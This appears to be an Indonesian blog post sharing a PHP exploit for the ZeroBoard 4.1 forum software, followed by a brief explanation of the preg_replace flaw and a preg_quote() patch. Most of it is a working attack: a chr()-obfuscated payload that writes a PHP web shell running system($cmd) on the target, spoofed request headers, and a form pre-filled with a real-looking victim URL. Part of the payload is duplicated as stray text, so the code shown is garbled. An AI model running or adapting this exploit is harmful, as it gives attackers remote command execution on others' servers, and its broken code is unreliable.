[PHP] POC + Exploit Zeroboard 4.1
Oleh
chmood
author : fix
source : http://75n1.blogspot.co.id/2015/09/cookie-stealing-over-sql-injection.html
<?php
/**
* @author Jei.Friee
* @copyright 2012
*
* ZeroBoard 4.1 Exploit
*/
error_reporting(0);
$str = 'REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47)
.chr(97).chr(110).chr(97).chr(115).chr(107).chr(105).chr(46).chr(112).chr
(104).chr(112),chr(119).chr(43)),chr(60).
chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).
chr(36).chr(99).chr(109).c
hr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&
HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=
1&HTTP_ENV_VARS=1';
.chr(97).chr(110).chr(97).chr(115).chr(107).chr(105).chr(46).chr(112).chr
(104).chr(112),chr(119).chr(43)),chr(60).
chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).
chr(36).chr(99).chr(109).c
hr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&
HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=
1&HTTP_ENV_VARS=1';
$uri_victim = $_GET['victim'].'/lib.php?'.$str;
$uri_playload = $_GET['victim'].'/data/now_connect.php';
$uri_shell = $_GET['victim'].'/data/shell.php';
if(isset($_GET['victim'])) {
@file_get_contents($uri_victim.'?'.$str);
@file_get_contents($_GET['victim'].'/data/now_connect.php');
echo "".$uri_shell."";
$host = @parse_url($_GET['victim'],PHP_URL_HOST);
//echo $host;
$fp = @fsockopen($host,'80',$errno,$errstr,20);
if($fp) {
$msg = null;
fputs($fp,"POST $uri_victim HTTP/1.1\r\n");
fputs($fp,"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n");
fputs($fp,"Referer: $uri_victim\r\n");
fputs($fp,"Accept-Language: zh-cn\r\n");
fputs($fp,"Content-Type: application/x-www-form-urlencoded\r\n");
fputs($fp,"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)\r\n");
fputs($fp,"CLIENT-IP: 127.0.0.1\r\n");
fputs($fp,"X-FORWARDED-FOR: 127.0.0.1\r\n");
fputs($fp,"Host: $host\r\n");
fputs($fp,"Content-Length: ".strlen($msg)."\r\n");
fputs($fp,"Connection: Keep-Alive\r\n");
fputs($fp,"Cache-Control: no-cache\r\n");
fputs($fp,"Cookie: $cookie\r\n");
fputs($fp,"\r\n");
fputs($fp,$msg."\r\n");
fputs($fp,"GET $uri_victim HTTP/1.1\r\n");
fputs($fp,"Host: $host\r\n");
fputs($fp,"Accept: */*\r\n");
fputs($fp,"Referer: $uri_victim\r\n");
fputs($fp,"User-Agent: Lamerz\r\n");
fputs($fp,"CLIENT-IP: 127.0.0.1\r\n");
fputs($fp,"X-FORWARDED-FOR: 127.0.0.1\r\n");
fputs($fp,"Pragma: no-cache\r\n");
fputs($fp,"Cache-Control: no-cache\r\n");
fputs($fp,"Connection: Close\r\n\r\n");
}
while($fp && !feof($fp)) {
$res[] = fread($fp,1024);
}
}
?>
<form method="get" action="" >
<input type="text" name="victim" size="25" value="http://leeminhothailand.com/board/" />
<input type="submit" value="Excute" name="exp" />
</form>
<pre>
<?php
print_r($res);
?>
</pre>
kesalahannya terdapat pada preg_replace() include/list_check.php baris 105/106
$keyword_pattern = "/([^<]*)$keyword([^>]*)/i" ;
$memo = preg_replace ( $keyword_pattern , "\\1<font color=FF001E style=background-color:FFF000;>$keyword</font>\\2" , $memo );
seperti yg di atas bbrpa syntax "<?php" tidak di filter
untuk memperbaikinya bisa menambahkan
fungsi preg_quote()
$keyword_pattern = "/([^<]*)preg_quote($keyword, "/")([^>]*)/i" ;
mngkin saya kurang bisa jelasin untuk lebih jelasnya bsa di cek di web http://pandora.sapzil.info/text/notify/20050123.zb41advisory.php
./CMIIW
Category
Komentar